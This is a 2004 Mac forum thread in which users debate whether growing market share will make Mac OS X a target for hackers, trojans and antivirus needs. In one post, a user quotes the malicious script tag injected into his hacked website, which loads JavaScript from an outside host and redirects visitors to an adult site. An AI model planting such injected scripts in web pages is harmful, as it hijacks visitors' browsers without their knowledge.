Are Hackers Now Gunning for the Mac?

Discussion in 'MacBytes.com News Discussion' started by MacBytes, Oct 15, 2004.

  1. macrumors bot

    Joined:
    Jul 5, 2003
    #1
  2. macrumors 603

    quagmire

    Joined:
    Apr 19, 2004
    #2
    Not at all. That means apple found many holes and fixed it before they were exploited by hackers. It doesn't mean at all hackers are gunning for the mac.
     
  3. Moderator emeritus

    Mr. Anderson

    Joined:
    Nov 1, 2001
    Location:
    VA
    #3
    But the sad reality of it is that the more popular Apple becomes, the bigger target it is.

    If anyone figured out how to foobar the firm ware on an iPod it would be a very sad day....

    It is a bit reassuring to get regular security updates from Apple proving that they're at least try to stay ahead of the game. :D

    D
     
  4. macrumors 65816

    Dr. Dastardly

    Joined:
    Jun 26, 2004
    Location:
    I live in a giant bucket!
    #4
    Its kind of a catch 22 with Apple. People want Apple to gain more in the market share but if they do it will attract more viruses and hackers. And then they will complain about that!

    I'll take the small market share over viruses anyday.
     
  5. macrumors 68030

    Analog Kid

    Joined:
    Mar 4, 2003
    #5
    What a dumb, pointless, shallow article... Anyone out there learn anything? Didn't think so...
     
  6. macrumors regular

    Joined:
    Jul 7, 2003
    Location:
    Columbus, Ohio area
    #6
    what writers like this forget

    OS X is not built on an OS that's full of holes going back years and years. Yes the underlying system is old, but it's not full of back doors and holes. The benefit is, even if someone makes a virus for OS X, it'll have a hard time spreading on its own, and I doubt you'll EVER see a hole in OS X large enough for someone to take over your machine without you ever doing anything but connecting to the net, which seems to be the case with Windows now. I can't imagine being an uninformed Windows users these days. They say it takes 20 min for a new Windows machine to be taken over from the time it is first connected to the net. Yikes.
     
  7. macrumors member

    Joined:
    Dec 3, 2003
    Location:
    SEMI
    #7
    Don't get too smug guys.

    I just spent two days tracking down a Trojan Horse on my G5.
     
  8. macrumors 603

    quagmire

    Joined:
    Apr 19, 2004
    #8
    You can still have a virus in your G5 as we speak. But, it won't effect it since it is not compatible with Macs. I can have 1 billion spyware, viruses, and trojans on my pbook but, won't effect it since the stuff works on Windows only.
     
  9. macrumors 6502

    Joined:
    May 18, 2003
    Location:
    Rehoboth Beach, De
    #9
    Not much learned. If I'm not mistaken the printer/password vulnerability was found by a third party in Scandinavia or whoville and was credited, like many others, for finding it. MS anyone. Many of the vulnerabilities are not inherent in OSX because the system requires admin approval to make system changes.
     
  10. macrumors 65816

    yamabushi

    Joined:
    Oct 6, 2003
    #10
    So, in the worst case Mac users may have to install antivirus software in the future to actually protect their own computer rather than to just prevent the spread of viruses to other computers? Oh well.
     
  11. macrumors Penryn

    Abstract

    Joined:
    Dec 27, 2002
    Location:
    Location Location
    #11
    I have never understood the desire for Apple to increase their small market share. I hope they stay small forever. Sorry, I know it's selfish, but the only benefit of Apple being bigger is Steve Jobs' paycheck, and I personally don't care about that.
     
  12. macrumors 6502

    Joined:
    May 10, 2004
    Location:
    I Come From A Land Down Under
    #12
    Not quite true, Steve only gets paid $1, as he says, to receive health benefits, needless of the company doing good or bad, he makes all of his money through stock options, and this week, he will be laughing all the way to the bank.

     
  13. macrumors regular

    Joined:
    Apr 13, 2003
    #13
    What was it called? Link to information?
     
  14. Moderator emeritus

    Mr. Anderson

    Joined:
    Nov 1, 2001
    Location:
    VA
    #14
    And how did you know it was on there?

    The one thing that might be a concern is fast user switching and not having a password on the accounts so you can just hit a button and not log in everytime. I tried that for a day and then put the passwords back on, not wanting to leave my machine open like that.

    I'm sure there are plenty of people out there who don't use passwords, though.

    D
     
  15. macrumors regular

    Joined:
    Jul 7, 2003
    Location:
    Columbus, Ohio area
    #15
    only one I know of

    There's only ONE trojan horse I know of, and it has to be installed manually, and it shows up in the startup items list, and can even be searched for by name, so it's not ANYTHING like the stuff on the PC that is burried deep in the registry files.
     
  16. macrumors member

    Joined:
    Jan 27, 2003
    #16
    And let's not forget that a virus for UNIX may even be ineffective on the Mac - Mac viruses may even have to exploit holes in Apple's closed code, such as Aqua, and that's not going to be as easy for the hackers as exploiting a UNIX vulnerability.
     
  17. macrumors 65816

    eric_n_dfw

    Joined:
    Jan 2, 2002
    Location:
    DFW, TX, USA
    #17
    Open source

    What they also failed to mention is the fact that the Darwin kernel is open sourced and many of the pieces that actually get the updates (OpenSSH, CUPS printing, etc) are ports from the opensource BSD community (which are often the same source code as their Linux versions). Apple and that community are mutually benefited when either one finds and fixes such exploits as the fixes are propogated to both code bases.

    BSD is well known for security (especially OpenBSD) as well.

    If you are a Linux or BSD user, you often see the same security updates for those distributions right before Apple's update.
     
  18. macrumors regular

    Joined:
    Feb 5, 2004
    #18
    Especially as Windoze shows again and again how terribly hard it is to exploit a weakness in closed code.
     
  19. macrumors member

    Joined:
    Dec 3, 2003
    Location:
    SEMI
    #19
    This is what Virex said. The files were in my Safari cache.

    Found the Exploit-ByteVerify trojan !!!
    Found the Exploit-ObjectData trojan !!!
    Found the Exploit-MhtRedir.gen trojan !!!

    As can be expected, they did not affect my Mac; but I still feel bad about passing them on.
     
  20. macrumors member

    Joined:
    Dec 3, 2003
    Location:
    SEMI
    #20
    My personal website had been hacked. While during research I read somewhere how Macs are not susceptible to virus, but they can still get trojans. Feeling paranoid I did a Virex search and found it. I deleted six instances, and the website hack ceased. I guess I was hacking my own site.

    Incidentally, the hack was that the following link was being added to all my pages

    Code:
    <script language="JavaScript” src="http://www.wizardsworldwide.com/chat/chat/localization/czech/catalog/spacer.gif?i=0c2a602a840a150cb337e2406913b775&to=http://www.f**klynx.com/lynx/Boobs/bigtits.html"></script>
    P.S. Yes, I am a newbie.
     
  21. macrumors P6

    wdlove

    Joined:
    Oct 20, 2002
    #21
    Did you have virus software installed on you Mac? I do just for safety sake.
     
  22. macrumors 68020

    AmigoMac

    Joined:
    Aug 5, 2003
    Location:
    l'Allemagne
    #22
    Don't you mean antivirus? ;)
     
  23. macrumors member

    Joined:
    Dec 3, 2003
    Location:
    SEMI
    #23
    I had Virex from .Mac, but I did not have the latest definitions (since corrected). I have Little Snitch running on my desktop but not on my PowerBook, so maybe my laptop was the instigator. Needless to say, I've got Little Snitch on both now. I even got Allume's Internet Cleanup for good measure.
     
  24. macrumors G5

    nagromme

    Joined:
    May 2, 2002
    #24
    Some things are obvious:

    1. Macs are more secure by design.

    2. Macs are smaller targets.

    BOTH those things help your data and your privacy stay secure. BOTH are good things.

    But Macs already ARE a target--some high-profile targets (like the US Army web sites) use them, and crackers are tempted by the prestige of tackling a tough OS. And yet we still have no viruses.

    One day we will. But we will NEVER have REMOTELY the problem of Windows. People talk as though tripling Mac market share from 5% to 15% or whatever would suddenly make Macs as vulnerable as Windows. Not so: both points above are still true.


    It's nice to say "we have no viruses" while it lasts. But it's also going to be very comforting when all we can say is "we have ALMOST no viruses compared to Windows." That's still going to make me a lot happier to keep my data on a Mac.

    (Re Trojan horses, a Trojan is convincing someone that one thing is another. It's one person lying to another--like an app creator saying "run my program, it does something good" when in fact it does harm, probably concealed. No OS can stop people lying to each other. All you can do is throw up a warning when installing something, but if the user trusts the source, they'll confirm the warning. No OS is secure against something the user WANTS to do, even if they are wrong to want it.)
     
  25. macrumors regular

    Joined:
    Apr 13, 2003
    #25
    How would you be passing them on? Do you mail your Safari cache to your friends? :)

    I think Virex just scared you for no good reason (or because they want you to feel your money was well spent on virex).

    You need IE for windows to be actually infected by those trojans. So your machine was never in real danger.

    The safari cache files are a mix of binary data and html. To actually infect any other windows user, you would have to remove the binary data first yourself. (otherwise the windows user wouldn't be able to open it). Then you need to put the cleaned up html files on your website, mail it to your windows friends, or put them on a network share.
     

Share This Page